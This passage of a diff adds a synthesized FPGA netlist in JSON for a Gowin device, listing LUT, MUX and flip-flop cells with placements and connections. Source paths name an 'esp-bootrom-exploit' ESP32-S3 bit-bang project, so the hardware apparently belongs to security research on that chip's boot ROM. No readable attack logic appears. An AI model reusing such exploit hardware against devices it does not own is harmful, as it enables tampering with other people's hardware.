"c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8009 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/MUX4", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 8002 ], + "I1": [ 8010 ], + "I0": [ 8009 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8005 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8004 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/MUX6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 8001 ], + "I1": [ 8005 ], + "I0": [ 8004 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/MUX5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7631 ], + "O": [ 7998 ], + "I1": [ 8002 ], + "I0": [ 8001 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O": { + "hide_name": 0, + "type": "MUX2_LUT7", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/MUX3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:166.14-166.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7635 ], + "O": [ 7992 ], + "I1": [ 7999 ], + "I0": [ 7998 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000000000001" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7590 ], + "I2": [ 7585 ], + "I1": [ 7580 ], + "I0": [ 7575 ], + "F": [ 7947 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0001" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:139.23-140.26", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I1": [ 7570 ], + "I0": [ 7564 ], + "F": [ 7945 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0001000000000000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7947 ], + "I2": [ 7945 ], + "I1": [ 7681 ], + "I0": [ 7674 ], + "F": [ 7991 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7990 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/MUX6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7992 ], + "O": [ 7885 ], + "I1": [ 7991 ], + "I0": [ 7990 ] + } + }, + "running_LUT4_I1_F_LUT3_F_I2_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1000000000000000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y15/LUT5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7704 ], + "I2": [ 7699 ], + "I1": [ 7693 ], + "I0": [ 7689 ], + "F": [ 7987 ] + } + }, + "running_LUT4_I1_F_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "10000000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y15/LUT3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7987 ], + "I1": [ 7715 ], + "I0": [ 7710 ], + "F": [ 7881 ] + } + }, + "running_LUT4_I1": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0111001101010000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/LUT5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7932 ], + "I2": [ 7902 ], + "I1": [ 7930 ], + "I0": [ 7901 ], + "F": [ 7556 ] + } + }, + "running_LUT3_I2": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "00001011" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/LUT3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7932 ], + "I1": [ 7902 ], + "I0": [ 7901 ], + "F": [ 7980 ] + } + }, + "running_LUT3_I1": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "10001100" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7902 ], + "I1": [ 7930 ], + "I0": [ 7901 ], + "F": [ 7981 ] + } + }, + "running_DFF_Q": { + "hide_name": 0, + "type": "DFF", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y14/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:13.6-13.47", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input" + }, + "connections": { + "Q": [ 7930 ], + "D": [ 7981 ], + "CLK": [ 7419 ] + } + }, + "running_DFFS_Q_D_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0100010101010101" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/LUT4", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7885 ], + "I2": [ 7889 ], + "I1": [ 7981 ], + "I0": [ 7980 ], + "F": [ 7978 ] + } + }, + "running_DFFS_Q": { + "hide_name": 0, + "type": "DFFS", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:55.7-55.57", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "SET": "input", + "Q": "output", + "D": "input", + "CLK": "input" + }, + "connections": { + "SET": [ 8057 ], + "Q": [ 7932 ], + "D": [ 7978 ], + "CLK": [ 7419 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7974 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7973 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/MUX0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 7966 ], + "I1": [ 7974 ], + "I0": [ 7973 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7969 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7968 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/MUX2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 7965 ], + "I1": [ 7969 ], + "I0": [ 7968 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/MUX1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7631 ], + "O": [ 7950 ], + "I1": [ 7966 ], + "I0": [ 7965 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7961 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT4", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7960 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/MUX4", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 7953 ], + "I1": [ 7961 ], + "I0": [ 7960 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000001000000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7610 ], + "I2": [ 7605 ], + "I1": [ 7600 ], + "I0": [ 7595 ], + "F": [ 7956 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7955 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/MUX6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 7952 ], + "I1": [ 7956 ], + "I0": [ 7955 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/MUX5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7631 ], + "O": [ 7949 ], + "I1": [ 7953 ], + "I0": [ 7952 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O": { + "hide_name": 0, + "type": "MUX2_LUT7", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y11/MUX3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:166.14-166.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7635 ], + "O": [ 7941 ], + "I1": [ 7950 ], + "I0": [ 7949 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0001000000000000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7947 ], + "I2": [ 7945 ], + "I1": [ 7681 ], + "I0": [ 7674 ], + "F": [ 7940 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 7939 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/MUX6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7941 ], + "O": [ 7741 ], + "I1": [ 7940 ], + "I0": [ 7939 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y13/LUT1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I1": [ 7889 ], + "I0": [ 7901 ], + "F": [ 7935 ] + } + }, + 